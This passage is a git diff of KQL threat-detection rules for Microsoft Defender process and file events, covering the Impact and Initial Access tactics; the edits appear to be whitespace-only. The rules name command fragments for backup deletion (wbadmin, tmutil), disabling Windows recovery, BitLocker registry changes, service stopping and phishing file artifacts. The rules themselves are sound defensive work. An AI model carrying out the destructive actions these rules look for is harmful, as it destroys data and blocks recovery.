--git a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql index a7dabeb3..32097d2e 100644 --- a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql +++ b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Stop Windows Service Via Net.EXE -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-05 -// Level: low -// Description: Detects the stopping of a Windows service via the "net" utility. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489 -// False Positives: -// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly - -DeviceProcessEvents +// Title: Stop Windows Service Via Net.EXE +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-05 +// Level: low +// Description: Detects the stopping of a Windows service via the "net" utility. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly + +DeviceProcessEvents | where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) \ No newline at end of file diff --git a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql index 452acd52..18221c55 100644 --- a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql +++ b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql @@ -1,12 +1,12 @@ -// Title: Stop Windows Service Via PowerShell Stop-Service -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-05 -// Level: low -// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489 -// False Positives: -// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly - -DeviceProcessEvents +// Title: Stop Windows Service Via PowerShell Stop-Service +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-05 +// Level: low +// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly + +DeviceProcessEvents | where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql index 14fd63aa..5f3b4964 100644 --- a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql +++ b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql @@ -1,12 +1,12 @@ -// Title: Stop Windows Service Via Sc.EXE -// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-05 -// Level: low -// Description: Detects the stopping of a Windows service via the "sc.exe" utility -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489 -// False Positives: -// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly - -DeviceProcessEvents +// Title: Stop Windows Service Via Sc.EXE +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-05 +// Level: low +// Description: Detects the stopping of a Windows service via the "sc.exe" utility +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly + +DeviceProcessEvents | where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe") \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql index 86e85510..87cf389b 100644 --- a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql +++ b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Creation TXT File in User Desktop -// Author: frack113 -// Date: 2021-12-26 -// Level: high -// Description: Ransomware create txt file in the user Desktop -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1486 - -DeviceFileEvents +// Title: Suspicious Creation TXT File in User Desktop +// Author: frack113 +// Date: 2021-12-26 +// Level: high +// Description: Ransomware create txt file in the user Desktop +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql index 667bed26..20ce224e 100644 --- a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql +++ b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution of Shutdown -// Author: frack113 -// Date: 2022-01-01 -// Level: medium -// Description: Use of the commandline to shutdown or reboot windows -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1529 - -DeviceProcessEvents +// Title: Suspicious Execution of Shutdown +// Author: frack113 +// Date: 2022-01-01 +// Level: medium +// Description: Use of the commandline to shutdown or reboot windows +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1529 + +DeviceProcessEvents | where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql index 86c8dbc8..95afeb96 100644 --- a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql +++ b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Execution of Shutdown to Log Out -// Author: frack113 -// Date: 2022-10-01 -// Level: medium -// Description: Detects the rare use of the command line tool shutdown to logoff a user -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1529 - -DeviceProcessEvents +// Title: Suspicious Execution of Shutdown to Log Out +// Author: frack113 +// Date: 2022-10-01 +// Level: medium +// Description: Detects the rare use of the command line tool shutdown to logoff a user +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1529 + +DeviceProcessEvents | where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql index df36ed47..906b300c 100644 --- a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql +++ b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql @@ -1,12 +1,12 @@ -// Title: Suspicious MacOS Firmware Activity -// Author: Austin Songer @austinsonger -// Date: 2021-09-30 -// Level: medium -// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. -// MITRE Tactic: Impact -// Tags: attack.impact -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Suspicious MacOS Firmware Activity +// Author: Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. +// MITRE Tactic: Impact +// Tags: attack.impact +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "setpasswd" or ProcessCommandLine contains "full" or ProcessCommandLine contains "delete" or ProcessCommandLine contains "check") and FolderPath =~ "/usr/sbin/firmwarepasswd" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql index 655c225c..56d1c284 100644 --- a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql +++ b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Reg Add BitLocker -// Author: frack113 -// Date: 2021-11-15 -// Level: high -// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1486 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Reg Add BitLocker +// Author: frack113 +// Date: 2021-11-15 +// Level: high +// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f") \ No newline at end of file diff --git a/KQL/rules/Impact/system_shutdown_reboot_macos.kql b/KQL/rules/Impact/system_shutdown_reboot_macos.kql index fdd299b4..039fdd94 100644 --- a/KQL/rules/Impact/system_shutdown_reboot_macos.kql +++ b/KQL/rules/Impact/system_shutdown_reboot_macos.kql @@ -1,12 +1,12 @@ -// Title: System Shutdown/Reboot - MacOs -// Author: Igor Fits, Mikhail Larin, oscd.community -// Date: 2020-10-19 -// Level: informational -// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1529 -// False Positives: -// - Legitimate administrative activity - -DeviceProcessEvents +// Title: System Shutdown/Reboot - MacOs +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1529 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents | where FolderPath endswith "/shutdown" or FolderPath endswith "/reboot" or FolderPath endswith "/halt" \ No newline at end of file diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql index 2fb186f4..a309ed3b 100644 --- a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql +++ b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql @@ -1,13 +1,13 @@ -// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS -// Author: Pratinav Chandra -// Date: 2024-05-29 -// Level: medium -// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". -// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". +// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where ProcessCommandLine contains "delete" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql index f8be93e0..3e5197f8 100644 --- a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql +++ b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql @@ -1,13 +1,13 @@ -// Title: Time Machine Backup Disabled Via Tmutil - MacOS -// Author: Pratinav Chandra -// Date: 2024-05-29 -// Level: medium -// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". -// An attacker can use this to prevent backups from occurring. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Legitimate administrator activity - -DeviceProcessEvents +// Title: Time Machine Backup Disabled Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". +// An attacker can use this to prevent backups from occurring. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents | where ProcessCommandLine contains "disable" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql index 42e6194f..cafb5b95 100644 --- a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql +++ b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql @@ -1,12 +1,12 @@ -// Title: User Has Been Deleted Via Userdel -// Author: Tuan Le (NCSGroup) -// Date: 2022-12-26 -// Level: medium -// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1531 -// False Positives: -// - Legitimate administrator activities - -DeviceProcessEvents +// Title: User Has Been Deleted Via Userdel +// Author: Tuan Le (NCSGroup) +// Date: 2022-12-26 +// Level: medium +// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1531 +// False Positives: +// - Legitimate administrator activities + +DeviceProcessEvents | where FolderPath endswith "/userdel" \ No newline at end of file diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql index b3b81cb3..6c7054e3 100644 --- a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql +++ b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql @@ -1,14 +1,14 @@ -// Title: Windows Backup Deleted Via Wbadmin.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-13 -// Level: medium -// Description: Detects the deletion of backups or system state backups via "wbadmin.exe". -// This technique is used by numerous ransomware families and actors. -// This may only be successful on server platforms that have Windows Backup enabled. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Legitimate backup activity from administration scripts and software. - -DeviceProcessEvents +// Title: Windows Backup Deleted Via Wbadmin.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: medium +// Description: Detects the deletion of backups or system state backups via "wbadmin.exe". +// This technique is used by numerous ransomware families and actors. +// This may only be successful on server platforms that have Windows Backup enabled. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate backup activity from administration scripts and software. + +DeviceProcessEvents | where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0")) \ No newline at end of file diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql index 613dd7ff..b6d8a09b 100644 --- a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql +++ b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql @@ -1,14 +1,14 @@ -// Title: Windows Recovery Environment Disabled Via Reagentc -// Author: Daniel Koifman (KoifSec), Michael Vilshin -// Date: 2025-07-31 -// Level: medium -// Description: Detects attempts to disable windows recovery environment using Reagentc. -// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE). -// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Legitimate administrative activity - -DeviceProcessEvents +// Title: Windows Recovery Environment Disabled Via Reagentc +// Author: Daniel Koifman (KoifSec), Michael Vilshin +// Date: 2025-07-31 +// Level: medium +// Description: Detects attempts to disable windows recovery environment using Reagentc. +// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE). +// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "-disable" or ProcessCommandLine contains "/disable" or ProcessCommandLine contains "–disable" or ProcessCommandLine contains "—disable" or ProcessCommandLine contains "―disable") and (FolderPath endswith "\\reagentc.exe" or ProcessVersionInfoOriginalFileName =~ "reagentc.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql index 9ede513f..1632ad0c 100644 --- a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql +++ b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql @@ -1,12 +1,12 @@ -// Title: Disk Image Mounting Via Hdiutil - MacOS -// Author: Omar Khaled (@beacon_exe) -// Date: 2024-08-10 -// Level: medium -// Description: Detects the execution of the hdiutil utility in order to mount disk images. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001 -// False Positives: -// - Legitimate usage of hdiutil by administrators and users. - -DeviceProcessEvents +// Title: Disk Image Mounting Via Hdiutil - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-10 +// Level: medium +// Description: Detects the execution of the hdiutil utility in order to mount disk images. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001 +// False Positives: +// - Legitimate usage of hdiutil by administrators and users. + +DeviceProcessEvents | where (ProcessCommandLine contains "attach " or ProcessCommandLine contains "mount ") and FolderPath endswith "/hdiutil" \ No newline at end of file diff --git a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql index 383905ac..c875e914 100644 --- a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql +++ b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql @@ -1,12 +1,12 @@ -// Title: ISO File Created Within Temp Folders -// Author: @sam0x90 -// Date: 2022-07-30 -// Level: high -// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file - -DeviceFileEvents +// Title: ISO File Created Within Temp Folders +// Author: @sam0x90 +// Date: 2022-07-30 +// Level: high +// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file + +DeviceFileEvents | where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso") \ No newline at end of file diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql index 068f7377..d2a1fb30 100644 --- a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql +++ b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql @@ -1,13 +1,13 @@ -// Title: ISO or Image Mount Indicator in Recent Files -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-11 -// Level: medium -// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. -// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - Cases in which a user mounts an image file for legitimate reasons - -DeviceFileEvents +// Title: ISO or Image Mount Indicator in Recent Files +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: medium +// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. +// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Cases in which a user mounts an image file for legitimate reasons + +DeviceFileEvents | where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk") \ No newline at end of file diff --git a/KQL/rules/Initial Access/octopus_scanner_malware.kql b/KQL/rules/Initial Access/octopus_scanner_malware.kql index 9ec9586d..ac84e02e 100644 --- a/KQL/rules/Initial Access/octopus_scanner_malware.kql +++ b/KQL/rules/Initial Access/octopus_scanner_malware.kql @@ -1,10 +1,10 @@ -// Title: Octopus Scanner Malware -// Author: NVISO -// Date: 2020-06-09 -// Level: high -// Description: Detects Octopus Scanner Malware. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1195, attack.t1195.001 - -DeviceFileEvents +// Title: Octopus Scanner Malware +// Author: NVISO +// Date: 2020-06-09 +// Level: high +// Description: Detects Octopus Scanner Malware. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1195, attack.t1195.001 + +DeviceFileEvents | where FolderPath endswith "\\AppData\\Local\\Microsoft\\Cache134.dat" or FolderPath endswith "\\AppData\\Local\\Microsoft\\ExplorerSync.db" \ No newline at end of file diff --git a/KQL/rules/Initial Access/office_macro_file_creation.kql b/KQL/rules/Initial Access/office_macro_file_creation.kql index cee346c6..baaec717 100644 --- a/KQL/rules/Initial Access/office_macro_file_creation.kql +++ b/KQL/rules/Initial Access/office_macro_file_creation.kql @@ -1,12 +1,12 @@ -// Title: Office Macro File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-23 -// Level: low -// Description: Detects the creation of a new office macro files on the systems -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - Very common in environments that rely heavily on macro documents - -DeviceFileEvents +// Title: Office Macro File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: low +// Description: Detects the creation of a new office macro files on the systems +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Very common in environments that rely heavily on macro documents + +DeviceFileEvents | where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm" \ No newline at end of file diff --git a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql index 84f15830..9640ab1d 100644 --- a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql +++ b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql @@ -1,10 +1,10 @@ -// Title: Office Macro File Creation From Suspicious Process -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-23 -// Level: high -// Description: Detects the creation of a office macro file from a a suspicious process -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 - -DeviceFileEvents +// Title: Office Macro File Creation From Suspicious Process +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: high +// Description: Detects the creation of a office macro file from a a suspicious process +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") \ No newline at end of file diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/Initial Access/office_macro_file_download.kql index 8a198700..8ffca814 100644 --- a/KQL/rules/Initial Access/office_macro_file_download.kql +++ b/KQL/rules/Initial Access/office_macro_file_download.kql @@ -1,14 +1,14 @@ -// Title: Office Macro File Download -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-23 -// Level: low -// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client). -// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - Legitimate macro files downloaded from the internet -// - Legitimate macro files sent as attachments via emails - -DeviceFileEvents +// Title: Office Macro File Download +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: low +// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client). +// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Legitimate macro files downloaded from the internet +// - Legitimate macro files sent as attachments via emails + +DeviceFileEvents | where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql index 633e7e3c..995ff0e8 100644 --- a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql +++ b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql @@ -1,12 +1,12 @@ -// Title: Phishing Pattern ISO in Archive -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-07 -// Level: high -// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566 -// False Positives: -// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction - -DeviceProcessEvents +// Title: Phishing Pattern ISO in Archive +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-07 +// Level: high +// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566 +// False Positives: +// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction + +DeviceProcessEvents | where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe") \ No newline at end of file diff --git a/KQL/rules/Initial 